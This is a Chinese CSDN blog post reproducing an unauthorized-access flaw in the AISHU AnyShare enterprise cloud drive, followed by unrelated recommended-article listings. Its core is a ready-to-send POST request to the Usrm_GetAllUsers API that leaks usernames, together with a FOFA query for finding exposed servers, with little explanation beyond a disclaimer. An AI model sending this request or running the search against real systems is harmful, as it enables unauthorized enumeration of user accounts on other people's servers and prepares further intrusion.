【漏洞复现】爱数云盘 Usrm_GetAllUsers 未授权访问漏洞

最新推荐文章于 2024-05-09 21:07:40 发布
最新推荐文章于 2024-05-09 21:07:40 发布
阅读量363 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/137471165
版权

0x01 产品简介

爱数云盘是一个为企业协作提供高效的文档办公服务的企业云盘,主要是做私有云文件管理服务。

0x02 漏洞概述

爱数 AnyShare存在未授权漏洞,未授权的攻击者可以通过该漏洞获取用户名信息。

0x03 测绘语句

fofa: app="AISHU-AnyShare"

0x04 漏洞复现

POST /api/ShareMgnt/Usrm_GetAllUsers HTTP/1.1

Host: xxx



[1,10]

0x05 影响范围

fofa: app="AISHU-AnyShare"

0x06 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

从不学安全
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
阿里云盘apk_阿里云盘(目前1T容量,不限速)可激活邀请码集合
weixin_39949954的博客
12-13 3424
你想要的是一款不限速、不打扰、够安全、易于协作的网盘?这些需求都会被满足,但这样还不够,我们要让你的每一次使用都充满惊喜和愉悦。简单说下,阿里有两款网盘产品,Teambition网盘是针对团队协作的,阿里云盘是针对个人用户的,两款产品定位不同,今天分享的是阿里云盘的邀请码,最近几天大批量的发放,任意邀请码都可激活成功,空间暂时只有1T。网页版地址:https://www.aliyundr...
Python上传和下载阿里云盘的实战代码
herosunly的博客
10-09 3万+
本文主要介绍了Python上传和下载阿里云盘的实战代码,希望对在不同环境下进行阿里云盘文件的上传和下载的同学们有所帮助。 文章目录 1. 前言 2. 安装Python库 3. 实战代码 3.1 上传文件夹 3.2 下载文件夹 3.3 下载文件
分享几个阿里云盘资源搜索引擎
热门推荐
兮动人
02-05 31万+
分享几个阿里云盘资源搜索引擎
曲奇云盘资源搜索引擎_曲奇云盘资源共享群组
weixin_39966376的博客
12-22 2万+
曲奇云盘资源共享群组app是一款团队协作云盘工具。曲奇云盘资源共享群组app保险箱,将文件存入保险箱,双重密码保护,更加安全有保障。安全保存,放心使用。曲奇云盘资源共享群组是一款团队协作云盘工具,可以帮您统一存储共享资料,有序管理价值文档,提升团队办公效率。软件特色【资料共享 协作无间】一人上传,团队成员均可在线查阅,无需重复上传下载重要文件更新,以动态消息实时推送至手机分享资料地址给合作伙伴,无...
史上最全阿里云盘资源搜索网站
Leon的博客
10-02 1万+
史上最全的阿里云盘资源搜索网站集合!
一行代码获取 获取 refresh_token 阿里云盘 转 本地硬盘 网络硬盘
QQ_1933621554 的博客
06-13 4644
一行代码获取 阿里云盘 转 本地硬盘 网络硬盘 获取 refresh_token
Linux环境下使用阿里云盘
兮动人
03-02 1万+
一直有个直播推流的想法,那就是把阿里云盘上的视频资源,在不下载到本地的情况下放在服务器上直播推流,这个时候就需要阿里云盘能能支持Linux环境下使用了。 目前阿里云盘官方还没有推出Linux环境下的版本,不知道后续是否推出。但在我偶然发现竟然有人推出了Linux环境下的阿里云盘,不禁感慨道github上大神云集。 目前阿里云盘还是在公测当中,作者也是随着更新在维护,希望后续官方能支持推出Linux命令式的版本。 项目地址:https://github.com/tickstep/aliyunp.
云盘上传一直显示服务器出错_百度云盘上传不了文件,显示服务器错误
weixin_31310913的博客
12-24 5456
应用程序发生异常 知的软件异常1.病毒木马造成的,在当今互联网时代,病毒坐着为了获得更多的牟利,常用病毒绑架应用程序和系统文件,然后某些安全杀毒软件把被病毒木马感染的应用程序和系统文件当病毒杀了导致的。2.应用程序组件丢失,应用程序完整的运行需要一些系统文件或者某些ll文件支持的,如果应用程序组件不完整也会导致的。3.系统文件损坏或丢失,盗版系统或Ghost版本系统,很容易出现该问题。4.操作系...
小白云盘TV_v1.5beta(增强版).rar
01-08
小白云盘TV_v1.5beta(增强版).rar
云盘网盘系统源码 快速对接多家云存储_云盘系统源码_云盘网盘系统_
10-01
PHP云盘网盘系统源码 快速对接多家云存储 全新一键安装版
云盘锁匠_v2.0.1.zip
11-15
在忘记分享链接密码的情况下,可通过该应用来获取链接地址的密码,应用场景很广阔,希望能帮到你/
Tecnomatix_CD15.0.1.rar 云盘链接.txt
03-27
Tecnomatix_CD15.0.1.rar 如题所述,附件为下载链接 Tecnomatix_CD15.0.1.rar 如题所述,附件为下载链接
GOPRO_Large dataset - 云盘链接.txt
10-18
GOPRO_Large:模糊和清晰的图像对;可用于图像修复、去模糊等; 8.9G 云盘链接分享,如有需要,请放心下载;
WEB漏洞挖掘——思路指南
lmf_goste的博客
12-30 8198
本篇主要记录了WEB漏洞挖掘过程中的信息收集部分,web渗透最重要的便是信息收集,希望以下内容能够给予在漏洞挖掘中迷茫的小伙伴一些帮助。 目录 信息收集 子域名 注意是否存在WAF 工具类 边缘资产 ICP备案查询 敏感信息收集 信息收集 信息收集的目的是为了更多的收集目标资产,扩大我们的渗透范围。WEB漏洞更多的存在于一些边缘资产和隐蔽的资产中。 子域名 在其他信息收集的过程中也可以先将域名放到文本中,最后进行去重 注意是否存在WAF 若检测存在WAF,扫描时需要降..
合规基线:让安全大检查更顺利
a38417的博客
04-29 1177
德迅基线产品还支持自定义基线功能,企业可根据实际的使用场景,自行定义基线的检查项,如定义检查阈值、自定义检查目录、自定义检查结果展现模板、自定义检查项整改方案等,以满足企业多样化的内部监管要求。但是在有限的安全人员、参差不齐的安全技术水平面前,迫切需要能够辅助安全检查与自评估的自动化、标准化的基线检查工具,并且能够支持多种类型的主机、数据库、应用系统等安全基线信息的采集与检测工作。,进行实时安全核查,快速发现安全配置变化,一旦发生安全配置变更异常,以邮件方式进行安全告警。相对于其他同等产品优势,
Burp Suite 抓包,浏览器提示有软件正在阻止Firefox安全地连接到此网站
最新发布
2302_77302329的博客
05-09 257
H01-启动和激活Burp.docx》——第5步。没有安装证书,在浏览器里面安装bp的证书就可以了。有软件正在阻止Firefox安全地连接到此网站。
python爬取百度云资源分享吧_python爬取百度云盘资源
05-22
在Python中爬取百度云资源需要使用到第三方库requests和BeautifulSoup。下面是一个简单的示例: ```python import requests from bs4 import BeautifulSoup # 构造请求头 headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'} # 目标url url = 'https://pan.baidu.com/s/1c2f1r0' # 发送请求 response = requests.get(url, headers=headers) # 解析网页内容 soup = BeautifulSoup(response.text, 'html.parser') # 获取提取码 code = soup.find('span', class_='pickpw').get_text() # 获取下载链接 link = soup.find('a', class_='btn btn-primary btn-xl g-clear download-btn')['href'] print('提取码:', code) print('下载链接:', link) ``` 需要注意的是,百度云盘会对用户的访问进行限制,如果爬虫过于频繁,可能会被封禁,因此在爬取时需要适当控制请求频率,避免被封禁。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值